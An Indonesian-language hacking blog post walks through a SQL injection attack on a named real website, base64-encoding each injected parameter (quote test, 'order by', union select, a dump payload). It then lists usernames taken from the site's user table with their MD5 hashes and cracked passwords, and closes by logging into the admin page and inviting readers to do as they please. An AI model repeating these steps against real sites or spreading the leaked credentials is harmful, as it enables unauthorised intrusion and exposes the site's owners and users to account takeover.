Tutorial Sql Injection Base64 Encode Url

Tutorial Sql Injection Base64 Encode Url



Sudah lama udah ga pernah posting
sekarang langsung aja ke tutorialnya
kali ini share Tutorial Sql Injection Base64 Encode Url
tollsnya pake hackbar,bisa kalian download di mozilla
langsung saja
target=
http://www.healthybox.id/promotion.php?jenisBannerId=NA==
decode dulu jadi
http://www.healthybox.id/promotion.php?jenisBannerId=4

selanjutnya kasih tanda '
http://www.healthybox.id/promotion.php?jenisBannerId=4'
jangan lupa di encode
http://www.healthybox.id/promotion.php?jenisBannerId=NCc=

kalo sebaggian text atau fotonya hilang tandanya vuln, lanjut
kita pakai perintah order by sama seperti injec biasa untuk mencari errornya

http://www.healthybox.id/promotion.php?jenisBannerId=4 order by 1-- -
jangan lupa di encode
http://www.healthybox.id/promotion.php?jenisBannerId=NCBvcmRlciBieSAxLS0gLQ==
selanjutnya saya langsung ke tempat error order by di 14
Jangan lupa diencode
jadi jumlah kolomnya ada 13
selanjutnya cari angka ajib
denga  union select
Jangan lupa diencode :v
nah kan keluar angka ajibnya, sekrang kita dump pake hackbar denga diosnya si
Madblood
Jangan lupa diencode
nah keluar tuh nama table nya 
tinggal get data hehehe
disini saya get data nya di tbl_user
Jangan lupa diencode

hahahahaha

akhirnya ketemu sekarang kita has passnya
terus cari halaman login nya

healthybox:25f9c946c627a8cdffe9f110e7606019 = 3nj0y1
hb :e10adc3949ba59abbe56e057f20f883e = 123456
adminhb :97f2902a5d0ac0d7d50ce79cd58ee4e3 = [Not found]
ganteng :8b6bc5d8046c8466359d3ac43ce362ab = ganteng

langsung ke halaman loginya dan login :D
nah sekarang terserah u mau diapain
sekian dulu tutorialnya  semoga bermanfaat bye








Tag =  sql , Injection , Base64 ,Encode , Sql Injection Base64 Encode Url, Sql Injection , Tutorial Sql Injection , Tutorial Sql Injection Base64 , Tutorial Sql Injection Base64 Encode

Tutorial Sql Injection Base64 Encode Url Rating: 4.5 Diposkan Oleh: Pencari Receh

0 komentar:

Post a Comment